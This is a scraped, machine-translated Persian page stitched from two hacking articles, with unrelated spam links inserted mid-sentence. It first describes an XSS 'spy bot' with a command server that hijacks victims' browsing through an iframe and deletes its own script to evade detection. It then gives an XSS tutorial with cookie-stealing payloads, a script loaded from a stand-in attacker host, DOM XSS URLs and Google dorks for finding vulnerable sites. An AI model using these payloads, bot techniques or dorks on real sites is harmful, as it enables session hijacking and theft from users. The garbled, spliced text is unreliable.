سرور ربات راه اندازی می شود یا حتی از راه دور انجام شود. پس از اجرای اسکریپت سرور، یک وب سرور مینیاتوری خودنویس شروع می شود که درخواست های ربات و کنترل کننده آن را که از طریق رابط وب کار می کند، ارائه می دهد. یعنی بعد از راه اندازی وب سرور یک لینک صادر می کند که با کلیک روی آن می توانید شروع به صدور دستورات به ربات کنید.</p> <p>در مورد این کنترل پنل اولاً لازم بود که آن را با یک رمز عبور محدود کنید (مسیر و تعداد کمی از افراد از سرویس در حال اجرا در فلان پورت یا آدرسی که برای استفاده از این سرویس باید به آن مراجعه کنید) اطلاع داشته باشند، تا اولین بار سرور یک رمز عبور می خواهد، که در نوار آدرس ارائه می شود (یک مثال داده خواهد شد)، رمز عبور اصلی در ذخیره می شود <i>password.txt</i>، که قابل تغییر است. پس از اولین بازدید، وب سرور به مرورگر دستور می دهد تا رمز عبور را در یک کوکی ذخیره کند، بنابراین دیگر لازم نیست نگران آن باشید.</p> <p>در صفحه ارسال دستورات به ربات، همچنین اطلاعاتی در مورد وضعیت ربات وجود دارد - در حال حاضر آنلاین یا آفلاین است و یکی دو تنظیمات که اولین آنها میزبان است، یعنی IP. آدرس یا دامنه سایتی که دستورات ربات به آن ارسال می شود. این در صورتی است که چندین سایت حاوی این ربات باشند تا بتوان آنها را شناسایی کرد. در سرور، همچنین برای این مورد، تمام داده ها به پوشه هایی با نام دامنه تقسیم می شوند. <br>سپس پنجره ای می آید که در آن دستورات را برای ربات در JS بنویسید، و گزینه ای که تعیین می کند کجا این کد JS اجرا شود، در پنجره اصلی، جایی که ربات قرار می گیرد یا در قاب - این برای راحتی انجام می شود، فقط در صورت لزوم. .</p> <p>اگر ربات آنلاین نباشد، سرور به سادگی دستورات را ذخیره می کند و بعداً که ربات آنلاین می شود، یعنی کاربر دوباره با آن صفحه را بازدید می کند یا لینک مهاجم را دنبال می کند، این دستورات اجرا می شود. <br>این بسیار راحت است اگر در اولین شناسایی، ربات تمام صفحات بازدید شده توسط کاربر را پرتاب کند (به عنوان مثال، <a href="https://bar812.ru/fa/mts-lichnyi-kabinet-cherez-nomer-lichnyi-kabinet-mts-rossiya-vhod-v.html">حساب شخصی</a>، پس از مطالعه کدی که دستورات آن را در JS کامپایل کردیم، به طوری که بعداً ربات روی پیوندهای مورد نیاز ما کلیک می کند، داده های لازم را وارد می کند، تصاویر لازم را نمایش می دهد و غیره که به رسیدن به هدف ما کمک می کند.</p> <p>یا می توانید مستقیماً در زمان واقعی، به سرعت محتویات صفحات را از طریق کد مشاهده کنید و به ربات دستور دهید تا کد صفحات دیگر را بفرستد، به آدرس دیگری برود و غیره. و همه اینها "پشت" انجام می شود صفحه نمایش" توسط کاربر، که با آرامش در یک قاب در سایت گشت و گذار می کند.</p> <p>برای راحتی شما، می توانید دستورالعمل های پرکاربرد را در کل توابع در JS شکل دهید، که سپس وارد می شوند. <a href="https://bar812.ru/fa/ishodnyi-kod-faila-robots-txt-roboty-yandeksa-crawl-delay-sekundomer-dlya-slabyh.html">فایل اصلی</a>ربات ها ( <i>xsb.js</i>، بیشتر در مورد ساختار فایل زیر) و استفاده کنید. یا قبلاً از توابعی که در ربات تعبیه شده است استفاده کنید، اگرچه فقط یک مورد اساسی وجود دارد و چیز جدیدی وجود ندارد، اما به عنوان مثال، می توانید از عملکرد ارسال کد صفحه در هر زمان استفاده کنید و نه در زمان فریم دوباره بارگذاری می شود. می‌توانید تابعی بنویسید که لینک‌های ارسال شده به آن را در فریم‌های جدید در پس‌زمینه باز کند تا محتویات چندین صفحه را به طور همزمان از طرف کاربر مشاهده کنید (و این محتوا را با دستان مجازی او کار کنید).</p> <h3><u><b>در حال حذف کد خودتان</b> </u></h3> <p>خوب <a href="https://bar812.ru/fa/spu-orb-poslednyaya-versiya-programmy-osnovnye-vozmozhnosti-i-dostoinstva.html">آخرین شانس</a>کاملاً ساده پیاده سازی می شود (با تنظیم متغیر مورد نظر در فایل می توان آن را غیرفعال کرد، آنها نظر داده می شوند). اسکریپت، پس از راه‌اندازی و آویز کردن همه کنترل‌کننده‌های رویداد، ایجاد همه متغیرها و توابع، خود را حذف می‌کند.</p> <p>پس از همه، تمام داده ها قبلاً بارگذاری شده اند <a href="https://bar812.ru/fa/kak-proverit-novuyu-operativnuyu-pamyat-kak-opredelit-i-ustranit-neispravnost.html">رم</a>از طریق مرورگر، بنابراین جای نگرانی نیست، اما این در تئوری است، ممکن است بعداً مشکلاتی وجود داشته باشد که من آنها را در نظر نگرفتم، بنابراین متغیری را پاداش دادم که در صورت لزوم می تواند این ویژگی را غیرفعال کند.</p> <p>پس از حذف همه اسکریپت ها، توجه به XSS بسیار دشوار خواهد بود، زیرا وجود یک فریم به طور غیرمستقیم این را نشان نمی دهد و خود کد را فقط می توان در گزارش های سابقه ترافیک شبکه مرورگر (که به طور پیش فرض در آن نگهداری نمی شود) پیدا کرد. اگر پنل توسعه دهنده باز نباشد، بسیاری از مرورگرها.</p> <h3><u><b>بخش سرور</b> </u></h3> <p>برای یک راه ساده تر و راحت تر برای راه اندازی ربات، تصمیم گرفته شد که وب سرور کوچک خود را روی سوکت ها بنویسیم، که به ربات سرویس می دهد، کلیه عملیات دریافت و قرار دادن داده های ارسالی را ارائه می دهد، پیام ها را بین مهاجم و ربات ارسال می کند. ، و یک رابط وب ایجاد کنید تا مهاجم دستور دهد. <br>سرور با پایتون نوشته شده بود، من سعی کردم فقط از کتابخانه های استاندارد استفاده کنم تا قبل از شروع نیازی به نصب چیزی نداشته باشم. همچنین خود سرور برخی از داده ها را در اسکریپت ها ویرایش می کند، یعنی در اسکریپت JS ربات نیازی نیست آدرس سرور فرمان را تنظیم کنید، خود وب سرور در هنگام راه اندازی درست را تنظیم می کند. تنها یک پارامتر در پیکربندی سرور وجود دارد - پورتی که روی آن اجرا می شود (به طور پیش فرض 8000). <br>پس از راه اندازی، سرور تمام داده های لازم را ارائه می دهد - پیوندی به اسکریپت JS، که باید لغزش شود، پیوندی به پانل فرمان، یا بهتر بگوییم پیوندها - به آدرس های خارجی و محلی، برای راحتی.</p> <h3><u><b>طرح کار با ربات.</b> </u></h3> <p>ما سرور را روی یک پورت بی ادعا راه اندازی می کنیم و شما می توانید پیوندی را با یک اسکریپت ربات ارسال کنید، سپس همه کسانی که آن را دنبال می کنند داده هایی را برای شما ارسال می کنند که سرور در هر زمانی از روز ذخیره می کند. سپس در صورت نیاز به ترک ربات تیم و ادامه کار خود، می توانید آنها را به سادگی مشاهده کنید.</p> <h3><u><b>ساختار فایل</b> </u></h3> <p>پوشه حاوی فایل های زیر است:</p> <ul><li><b>xsb.py</b>- فایل اصلی که قسمت سرور را پیاده سازی می کند، آن را اجرا کنید تا ربات کار کند و سپس فقط از لینکی که ارائه می دهد استفاده کنید.</li> <li><b>xsb.js</b>- کد JS ربات در اینجا ذخیره می شود، پیوندی که سرور به آن صادر می کند، در ابتدای آن متغیرهای پیکربندی اعلام شده است، که به صلاحدید شما قابل تغییر است (بعضی از آنها، یعنی هاست و پورت، سپس سرور خودش را تنظیم می کند، لازم نیست نگران باشید)</li> <li><b>panel.html</b>- از اینجا سرور کد پنل کنترل ربات را می گیرد، می توانید رابط را به صلاحدید خود تغییر دهید.</li> <li><b>password.txt</b>- رمز عبور از کنترل پنل در اینجا ذخیره می شود که می توان آن را تغییر داد.</li> <li><b>داده های ذخیره شده</b>دایرکتوری است که در آن پوشه هایی با دامنه سایت ایجاد می شود که تمام اطلاعات در آن ذخیره می شود.</li> </ul><p>یک بار دیگر در فایل یادداشت می کنم <i>xsb.js</i>شما می توانید توابع خود را اضافه کنید، که سپس از طریق پانل فراخوانی می شوند، بدون نوشتن بخش های عظیمی از کد.</p> <h3><u><b>تجزیه و تحلیل کوچک از نتایج.</b> </u></h3> <p>پس از نوشتن روش اختراعی من برای نگه داشتن کاربر در صفحه با XSS از طریق فریم (خوب، همانطور که اختراع شد - من شخصاً آن را برای خودم کشف کردم، کاملاً ممکن است که شخص دیگری این تکنیک را برای خود "اختراع" کرده باشد یا قبلاً در جایی در عمومی درخشید، زیرا اکنون توسعه چیزی واقعاً جدید بسیار دشوار است، و به عنوان یک قاعده، پس از مدتی متوجه می شوید که "قبلاً در سیمپسون ها بود") من شروع کردم به کاوش در BeEF'e با جزئیات بیشتر و خواندن ویکی آن . سپس متوجه شدم که تکنیک دیگری برای رسیدن به همان هدف در آنجا پیاده سازی شده است - افزایش زمان کاربر در صفحه با XSS اجرایی (که در آنجا نامیده می شود. <i>مرد در مرورگر</i>). و به این صورت پیاده سازی شد: تمامی لینک های صفحه اصلی به گونه ای تغییر یافتند که با کلیک بر روی هر یک از آنها، اسکریپت صفحه را بارگذاری مجدد نمی کرد، بلکه درخواستی را از طریق Ajax به سرور ارسال می کرد و داده های دریافتی را در آن درج می کرد. پاسخ، یعنی می توان گفت که به طور مصنوعی آن را به روز می کند، که همچنین تقریباً از یک رفرش معمولی قابل تشخیص نبود.</p> <p>بنابراین، من اولین کسی نبودم که به این ایده پی بردم (حتی اگر روش ها متفاوت باشد). اما هر دوی این روش ها معایبی دارند:</p> <p>روش بارگذاری از طریق <iframe>اگر هدر در پاسخ وجود داشته باشد کار نمی کند <i>X-Frame-Options:DENY</i>، اما بقیه مانند یک پنجره مرورگر معمولی شخم می زنند.</p> <p>روش دوست دختر ajax همیشه در صورتی کار می کند که مرورگر از آن پشتیبانی کند (اکنون همه مرورگرهای اصلی از آن پشتیبانی می کنند)، اما با استاندارد جدید Web 2.0، انتقال های بیشتر و بیشتری توسط رویدادهای سفارشی هر عنصر از طریق JS آغاز می شود. یک روز به Google AdWords رفتم و تصمیم گرفتم ببینم چگونه HTML و JS آنها در آنجا با هم تعامل دارند، زیرا همه عنکبوت های من در ایجاد نقشه برای این سرویس بسیار بد بودند. و تمام غروب بی سر و صدا ترسیدم، چه زمانی همه چیز آنجا غیرعادی بود <a href="https://bar812.ru/fa/kak-chto-nibud-narisovat-poverh-video-faila-s-pomoshchyu-adobe-after-effects.html">عناصر متن</a>هم دکمه‌ها، هم سوئیچ‌کننده‌ها و هم لغزنده‌ها بودند و به هیچ‌وجه نشان داده نمی‌شدند و روی هر کدام حدود 30 کنترل کننده رویدادهای مختلف آویزان بودند.</p> <p>یعنی در یک سایت انبوه، دکمه انتقال (به طور ذهنی یک پیوند) از طریق یک برچسب معمولی پیاده سازی می شود. <i><span> </i>، که با سبک ها بارگذاری شده است و کنترل کننده های رویداد روی آن آویزان شده اند، که یکی از آنها، برای مثال، <i>onclick کاربر را به صفحه دیگری هدایت می کند. همچنین داشته باشند <a href="https://bar812.ru/fa/kak-naiti-skrytye-papki-na-kompyutere-kak-naiti-skrytye-papki-poisk.html">عناصر استاندارد</a>نوع [i] <input type=button> </i>یا خودم <i><button> </i>و غیره، که در واقع پیوندهایی به صفحات دیگر هستند، اما BeEF به آنها پاسخ نمی دهد و با کلیک بر روی اکثر دکمه ها و سایر عناصر، صفحه به سادگی به روز نمی شود. که ممکن است کاربر را وادار کند که صفحه را بازخوانی کند یا "از طرف دیگر" دوباره بازدید کند، که جلسه XSS فعال ما را از بین می برد.</p> <p>برای مختصر نامگذاری فایل، آن را - Xss Spy Bot نامیدم.</p> <p>P.S. <br>کل این پرونده به دلیل کمبود زمان و حواس پرتی مداوم کمی بیشتر از یک ماه نوشته شده است. همچنین به همین دلیل، هم کیفیت کد و هم احتمال برخورد با نوعی باگ بسیار بالاست. بنابراین از شما می خواهم که زیاد قسم نخورید، بلکه اشتراک را لغو کنید، چه ایرادی دارد تا بتوانید آن را برطرف کنید. <br>من خودم ربات رو فقط روی 4 ماشین تست کردم که همشون دبیان رو اجرا میکردن.</p> <p>برنامه های بلند مدت برای این ربات، در صورت وجود انگیزه: <br>- اجرای رندر کد صفحاتی که ربات به سرور ارسال می کند، به طوری که بلافاصله در مرورگر باز می شود و می توان آن را "لمس" کرد، در پرواز آزمایش کرد. <br>- آنها سعی می کنند از فناوری WebRTC به دست بیاورند، یعنی راه هایی برای به دست آوردن اطلاعات جدیدی که با JS خالص نمی توانند بیرون بیایند، پیدا کنند. <br>- برقراری ارتباط بین ربات و سرور از طریق پروتکل WebSocket از طریق HTTP. <br>- کمی راحتی به کنترل پنل اضافه کنید.</p> <p>آخرین به روز رسانی در 18 نوامبر 2016.</p> <p>اسکریپت بین سایتی (XSS) آسیب پذیری است که شامل تزریق کد سمت کلاینت (جاوا اسکریپت) به صفحه وب است که سایر کاربران در حال مشاهده آن هستند.</p> <p>این آسیب‌پذیری به دلیل فیلتر ناکافی داده‌هایی است که کاربر برای درج در یک صفحه وب ارسال می‌کند. خیلی راحت تر میشه فهمید <a href="https://bar812.ru/fa/ustanovit-vindovs-10-na-chistyi-zhestkii-disk-kak-ustanovit-windows-napryamuyu.html">مثال ملموس</a>. هر کتاب مهمان را به خاطر بسپارید - اینها برنامه هایی هستند که برای پذیرش داده ها از کاربر و سپس نمایش آنها طراحی شده اند. بیایید تصور کنیم که کتاب مهمان به هیچ وجه داده های وارد شده را بررسی یا فیلتر نمی کند، بلکه آنها را به سادگی نمایش می دهد.</p> <p>شما می توانید ساده ترین اسکریپت خود را ترسیم کنید (هیچ چیز ساده تر از نوشتن اسکریپت های بد در PHP نیست - بسیاری از افراد این کار را انجام می دهند). اما در حال حاضر گزینه های آماده زیادی وجود دارد. به عنوان مثال، من پیشنهاد می کنم با Dojo و OWASP Mutillidae II شروع کنید. نمونه مشابهی در آنجا وجود دارد. در یک محیط Dojo مستقل، در مرورگر خود به آدرس زیر بروید: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>اگر یکی از کاربران وارد کرد:</p><p>سپس صفحه وب نمایش داده می شود:</p><p>سلام! سایت خود را لایک کنید.</p><p>و اگر کاربر به این صورت وارد شود:</p><p>سلام! سایت خود را لایک کنید.<script>alert("Pwned")</script> </p><p>به این صورت نمایش داده خواهد شد:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>مرورگرها کوکی های زیادی را از تعداد زیادی سایت ذخیره می کنند. هر سایت فقط می تواند کوکی های ذخیره شده توسط خودش را دریافت کند. به عنوان مثال، example.com برخی از کوکی ها را در مرورگر شما ذخیره کرده است. شما به Another.com بروید، آن سایت (اسکریپت های سرویس گیرنده و سرور) نمی تواند به کوکی های ذخیره شده توسط example.com دسترسی پیدا کند.</p> <p>اگر example.com در برابر XSS آسیب پذیر باشد به این معنی است که به نوعی می توانیم کد جاوا اسکریپت را به آن تزریق کنیم و این کد از طرف example.com اجرا می شود! آن ها این کد به عنوان مثال به کوکی ها از سایت example.com دسترسی خواهد داشت.</p> <p>فکر می کنم همه به خاطر دارند که جاوا اسکریپت در مرورگرهای کاربران اجرا می شود، یعنی. در حضور XSS، کد مخرب تزریق شده به داده های کاربری که صفحه وب سایت را باز کرده است دسترسی پیدا می کند.</p> <p>کد تزریق شده می تواند هر کاری را که جاوا اسکریپت می تواند انجام دهد، یعنی:</p> <ul><li>به کوکی ها از سایتی که در حال مرور آن هستید دسترسی دارد</li> <li>ممکن است هر گونه تغییری در آن ایجاد کند <a href="https://bar812.ru/fa/radeon-r3-harakteristiki-karty-na-noutbuke-vneshnii-vid-i-tehnicheskaya-specifikaciya.html">ظاهر</a>صفحات</li> <li>به کلیپ بورد دسترسی پیدا می کند</li> <li>می تواند برنامه های جاوا اسکریپت مانند کی لاگرها (رهگیرهای ضربه زدن به کلید) را تزریق کند.</li> <li>به BeEF متصل شوید</li> <li>و غیره.</li> </ul><p>ساده ترین مثال با کوکی ها:</p><p> <script>alert(document.cookie)</script> </p><p>در حقیقت، <b>هشدار</b>فقط برای تشخیص XSS استفاده می شود. محموله مخرب واقعی اعمال مخفیانه انجام می دهد. او مخفیانه با <a href="https://bar812.ru/fa/debugging-tools-for-windows-ispolzovanie-ustanovka-i-nastroika-windbg-dlya.html">سرور راه دور</a>مهاجم و اطلاعات دزدیده شده را به او منتقل می کند.</p> <h2>انواع XSS <br></h2> <p>مهمترین چیزی که باید در مورد انواع XSS بدانید این است که آنها عبارتند از:</p> <ul><li>ذخیره شده (دائمی)</li> <li>منعکس شده (غیر دائمی)</li> </ul><p>مثال ثابت:</p> <ul><li>هر بار که کاربران درخواست می کنند صفحه نمایش داده شود، یک پیام دفتر مهمان ساخته شده ویژه وارد شده توسط مهاجم (نظر، پست انجمن، نمایه) که در سرور ذخیره می شود، از سرور دانلود می شود.</li> <li>برای مثال، یک مهاجم به داده های سرور دسترسی پیدا کرده است <a href="https://bar812.ru/fa/inurl-single-php-id-chaemyi-instrukciya-po-ispolzovaniyu-jsql-injection-mnogofunkcionalnogo.html">تزریق SQL</a>و کد مخرب جاوا اسکریپت (با کی لاگر یا با BeEF) را به داده های صادر شده برای کاربر تزریق کرد.</li> </ul><p>مثال غیر ثابت:</p> <ul><li>جستجویی در سایت وجود دارد که همراه با نتایج جستجو چیزی شبیه "شما جستجو کردید: [رشته جستجو]" را نشان می دهد، در حالی که داده ها به درستی فیلتر نشده اند. از آنجایی که چنین صفحه ای فقط برای کسانی که لینکی به آن دارند نمایش داده می شود، تا زمانی که مهاجم لینک را برای سایر کاربران سایت ارسال نکند، حمله کار نخواهد کرد. به جای ارسال پیوند به قربانی، می توان از میزبانی یک اسکریپت مخرب در یک سایت خنثی که قربانی بازدید می کند استفاده کرد.</li> </ul><p>آنها همچنین متمایز می کنند (برخی به عنوان یک نوع آسیب پذیری XSS غیر پایدار، برخی می گویند که این نوع همچنین می تواند یک نوع XSS پایدار باشد):</p> <ul><li>مدل های DOM</li> </ul><h2>ویژگی های XSS مبتنی بر DOM <br></h2> <p>به بیان ساده، اگر کد HTML را باز کنیم، می‌توانیم کد مخرب XSS غیر دائمی «عادی» را ببینیم. به عنوان مثال، یک لینک به شکل زیر تشکیل می شود:</p><p>http://example.com/search.php?q="/><script>alert(1)</script> </p><p>و هنگام باز کردن کد منبع HTML، چیزی شبیه به این را می بینیم:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">پیدا کردن</button> </form> </p><p>و DOM XSS ساختار DOM را که در مرورگر ایجاد می شود تغییر می دهد و ما می توانیم کدهای مخرب را فقط هنگام مشاهده ساختار DOM تشکیل شده مشاهده کنیم. HTML تغییر نمی کند. بیایید این کد را به عنوان مثال در نظر بگیریم:</p><p> <!DOCTYPE html> <html> <head> <title>سایت:::DOM XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default">خطایی رخ داد...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>سپس در مرورگر خواهیم دید:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>کد منبع صفحه:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>بیایید آدرس را به صورت زیر تشکیل دهیم:</p><p>http://localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)</script>; </p><p>حالا صفحه به شکل زیر است:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>اما بیایید نگاهی به آن بیندازیم <a href="https://bar812.ru/fa/razrabotka-sistemy-avtomaticheskogo-poiska-obektov-na-izobrazhenii-eclipse--.html">منبع</a> HTML:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>مطلقاً هیچ چیز تغییر نکرده است. این چیزی است که من در مورد آن صحبت کردم، برای شناسایی کدهای مخرب باید به ساختار DOM سند نگاه کنیم:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>در اینجا یک نمونه اولیه XSS در حال کار است، برای یک حمله واقعی ما به یک بار پیچیده تر نیاز داریم، که به دلیل توقف خواندن برنامه بلافاصله پس از نقطه ویرگول امکان پذیر نیست و چیزی شبیه به <b>هشدار (1)؛ هشدار (2)</b>در حال حاضر غیر ممکن است با این حال، به لطف <b>unescape()</b>در داده های برگشتی، می توانیم از یک payload مانند زیر استفاده کنیم:</p><p>http://localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)%3balert(2)</script>; </p><p>جایی که نماد را جایگزین کرده ایم <b>; </b>به معادل کدگذاری شده با URI!</p> <p>اکنون می‌توانیم یک بار مخرب جاوا اسکریپت بنویسیم و پیوندی را برای ارسال به قربانی بنویسیم، درست مانند اسکریپت‌های متقابل غیر دائمی استاندارد.</p> <h2>حسابرس XSS <br></h2> <p>AT <a href="https://bar812.ru/fa/skachat-gugl-hrom-obnovlennaya-versiya-usloviya-predostavleniya-uslug-google-chrome.html">گوگل کروم</a>(و همچنین در Opera، که اکنون از موتور Google Chrome استفاده می کند)، من با این شگفتی مواجه شدم:</p> <blockquote> <p>dom_xss.html:30 حسابرس XSS از اجرای اسکریپت در "http://localhost/tests/XSS/dom_xss.html#input=token‹script›alert(1) خودداری کرد.</script>;" زیرا کد منبع آن در درخواست پیدا شد. حسابرس فعال شد زیرا سرور نه یک "X-XSS-Protection" و نه "Content-Security-Policy" را ارسال کرد.</p> </blockquote> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>آن ها مرورگر اکنون یک حسابرس XSS دارد که سعی می کند از XSS جلوگیری کند. فایرفاکس هنوز این قابلیت را ندارد، اما فکر می‌کنم موضوع زمان است. اگر پیاده سازی در مرورگرها موفقیت آمیز باشد، می توانیم در مورد یک مشکل قابل توجه در استفاده از XSS صحبت کنیم.</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>یادآوری آن مفید است <a href="https://bar812.ru/fa/chto-znachit-rezhim-turbo-v-brauzerah-kak-vklyuchaetsya-i-kak-rabotaet-chto.html">مرورگرهای مدرن</a>در حال انجام اقداماتی برای محدود کردن سطح بهره برداری از مسائلی مانند XSS غیر پایدار و XSS مبتنی بر DOM هستند. این چیزی است که هنگام آزمایش وب سایت ها با استفاده از مرورگر باید به خاطر داشته باشید - ممکن است مشخص شود که یک برنامه وب آسیب پذیر است، اما فقط به این دلیل که مرورگر آن را مسدود می کند، یک پاپ آپ تأیید نمی بینید.</p> <h2>مثال های بهره برداری XSS <br></h2> <p>مهاجمانی که قصد سوء استفاده از آسیب‌پذیری‌های اسکریپت بین سایتی را دارند، باید به هر کلاس آسیب‌پذیری متفاوت برخورد کنند. بردارهای حمله برای هر کلاس در اینجا توضیح داده شده است.</p> <p>برای آسیب‌پذیری‌های XSS، حملات می‌توانند از BeEF استفاده کنند که حمله را از وب‌سایت به محیط محلی کاربران گسترش می‌دهد.</p> <p><b>نمونه ای از یک حمله XSS غیر مداوم</b></p> <p>1. آلیس به طور مکرر از وب سایت خاصی که توسط باب میزبانی می شود بازدید می کند. وب سایت باب به آلیس اجازه می دهد تا با نام کاربری/رمز عبور وارد سیستم شود و داده های حساس مانند اطلاعات صورتحساب را ذخیره کند. هنگامی که کاربر وارد سیستم می شود، مرورگر کوکی های مجوز را ذخیره می کند که شبیه کاراکترهای بی معنی هستند، به عنوان مثال. هر دو کامپیوتر (مشتری و سرور) به یاد دارند که او وارد شده است.</p> <p>2. مالوری خاطرنشان می کند که وب سایت باب دارای یک آسیب پذیری غیر دائمی XSS است:</p> <p>2.1 هنگام بازدید از یک صفحه جستجو، او یک رشته جستجو را وارد می کند و روی دکمه ارسال کلیک می کند، اگر نتیجه ای یافت نشد، صفحه رشته جستجوی وارد شده را به دنبال کلمات "نیافتاده" نمایش می دهد و آدرس اینترنتی شبیه به آن است. <b>http://bobssite.org?q=her <a href="https://bar812.ru/fa/servis-dlya-gruppirovki-klyuchevyh-zaprosov-klasterizaciya.html">پرس و جو جستجو</a> </b></p> <p>2.2 با یک عبارت جستجوی معمولی مانند کلمه " <b>سگ ها</b>»صفحه به سادگی رندر می شود« <b>سگ ها</b>یافت نشد" و آدرس http://bobssite.org?q= <b>سگ ها</b>، که رفتاری کاملاً عادی است.</p> <p>2.3 با این حال، هنگامی که یک عبارت جستجوی غیرعادی مانند <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 یک پیام هشدار ظاهر می شود (که می گوید "xss").</p> <p>2.3.2 نمایش صفحه <b><script type="text/javascript">alert("xss");</script>پیدا نشد</b>به همراه یک پیام خطا با متن "xss".</p> <p>2.3.3 آدرس اینترنتی قابل بهره برداری <b>http://bobssite.org?q=<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. Mallory یک URL برای سوء استفاده از آسیب‌پذیری ایجاد می‌کند:</p> <p>3.1 او URL می سازد <b>http://bobssite.org?q=توله سگ<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>. او ممکن است انتخاب کند که کاراکترهای ASCII را به فرمت هگزادسیمال تبدیل کند <b>http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E</b>برای جلوگیری از رمزگشایی فوری URL مخرب توسط افراد.</p> <p>3.2 او به برخی از اعضای ناآگاه سایت باب ایمیل می‌زند و می‌گوید: «سگ‌های باحال را بررسی کنید».</p> <p>4. آلیس نامه ای دریافت می کند. او عاشق سگ است و روی لینک کلیک می کند. او برای جستجو به سایت باب می رود، چیزی پیدا نمی کند، می گوید "سگ ها پیدا نشد" و در وسط یک برچسب با یک اسکریپت راه اندازی می شود (روی صفحه نامرئی است)، برنامه مالوری را دانلود و اجرا می کند. authstealer.js (حمله XSS آغاز شد). آلیس آن را فراموش می کند.</p> <p>5. برنامه authstealer.js در مرورگر Alice اجرا می شود که گویی از وب سایت باب سرچشمه گرفته است. او یک کپی از کوکی مجوز آلیس را می گیرد و آن را به سرور مالوری می فرستد، جایی که مالوری آنها را بازیابی می کند.</p> <p>7. حالا که مالوری داخل است، به بخش پرداخت وب سایت می رود، نگاه می کند و یک نسخه از شماره را می دزدد. <a href="https://bar812.ru/fa/rabochaya-shema-po-uvodu-deneg-s-kreditnyh-kart-sberbanka-cherez-bilain.html">کارت اعتباری</a>آلیس. سپس می رود و رمز عبور را تغییر می دهد، یعنی. حالا آلیس حتی دیگر نمی تواند وارد شود.</p> <p>8. او تصمیم می گیرد قدم بعدی را بردارد و لینک ساخته شده به این روش را برای خود باب ارسال می کند و بدین ترتیب امتیازات اداری برای سایت باب به دست می آورد.</p> <p><b>با XSS مداوم حمله کنید</b></p> <ol><li>مالوری در وب سایت باب حساب کاربری دارد.</li> <li>مالوری متوجه می شود که وب سایت باب دارای یک آسیب پذیری دائمی XSS است. اگر در حال حرکت به <a href="https://bar812.ru/fa/kak-skopirovat-disk-s-vindoi-kak-perenesti-operacionnuyu-sistemu-na.html">بخش جدید</a>، یک نظر ارسال کنید، هر آنچه در آن تایپ شده را نشان می دهد. اما اگر متن نظر حاوی تگ‌های HTML باشد، آن تگ‌ها همانطور که هست رندر می‌شوند و هر تگ اسکریپت اجرا می‌شود.</li> <li>مالوری مقاله را در بخش اخبار می خواند و در بخش نظرات نظر می نویسد. او متن را در نظر وارد می کند:</li> <li>در این داستان من سگ ها را خیلی دوست داشتم. آنها خیلی خوب هستند! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>وقتی آلیس (یا هر شخص دیگری) صفحه را با این نظر بارگذاری می‌کند، تگ اسکریپت مالوری اجرا می‌شود و کوکی مجوز آلیس را می‌دزدد، آن را برای جمع‌آوری به سرور مخفی مالوری می‌فرستد.</li> <li>مالوری اکنون می تواند جلسه آلیس را ربوده و خود را جعل هویت آلیس کند.</li> </ol><h2>یافتن سایت های آسیب پذیر به XSS <br></h2> <p><b>Dorks برای XSS</b></p> <p>اولین قدم این است که سایت هایی را انتخاب کنیم که در آنها حملات XSS را انجام خواهیم داد. سایت ها را می توان با استفاده از Google dorks جستجو کرد. در اینجا چند مورد از این dorks وجود دارد که می توانید آنها را کپی و در جستجوی Google جایگذاری کنید:</p> <ul><li>inurl:search.php?q=</li> <li>inurl:.php?q=</li> <li>inurl:search.php</li> <li>inurl:.php?search=</li> </ul><p>لیستی از سایت ها در مقابل ما باز می شود. شما باید سایت را باز کنید و فیلدهای ورودی مانند فرم را در آن پیدا کنید <a href="https://bar812.ru/fa/ubitye-muzhchiny-memberlist-php-form-forma-obratnoi-svyazi-na-php-s-otpravkoi-na.html">بازخورد</a>، فرم ورودی، جستجوی سایت و غیره</p> <p>فوراً متذکر می شوم که جستجوی آسیب پذیری در برنامه های وب محبوب که به طور خودکار به روز می شوند عملاً بی فایده است. یک نمونه کلاسیک از چنین برنامه هایی وردپرس است. در واقع، آسیب پذیری هایی در وردپرس و به ویژه در افزونه های آن وجود دارد. علاوه بر این، بسیاری از سایت‌ها وجود دارند که نه موتور 